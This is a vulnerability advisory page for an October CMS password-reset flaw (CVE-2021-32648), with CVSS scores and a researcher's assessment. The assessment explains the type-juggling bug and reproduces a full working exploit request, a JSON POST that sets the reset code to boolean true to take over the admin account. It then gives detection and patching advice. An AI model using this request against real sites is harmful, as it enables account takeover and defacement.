CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
89.6%
octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
Recent assessments:
kevthehermit at January 14, 2022 5:01pm UTC reported:
This is a simple Type Confusion / Juggling vulnerability.
October CMS will check to see if the User Supplied reset code matches the value in the database return ($this->reset_password_code == $resetCode);
If we can send a boolean value in place of a reset code we can bypass this check.
Laravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist.
To exploit this vulnerability we simply need to set the Content-Type
to JSON and structure our POST request accordingly. An example POST is shown below.
POST /backend/backend/auth/reset/1/[] HTTP/1.1
Host: 172.17.0.2
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.17.0.2
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.2/backend/backend/auth/reset/1/a
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9
Connection: close
{"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}
This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites β <https://twitter.com/KimZetter/status/1481890639029551106>
A proof of concept python script that will attempt to reset the password for the admin account has been published β <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>
An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.
Applying the patches will successfully mitigate against this attack.
Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 5
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
89.6%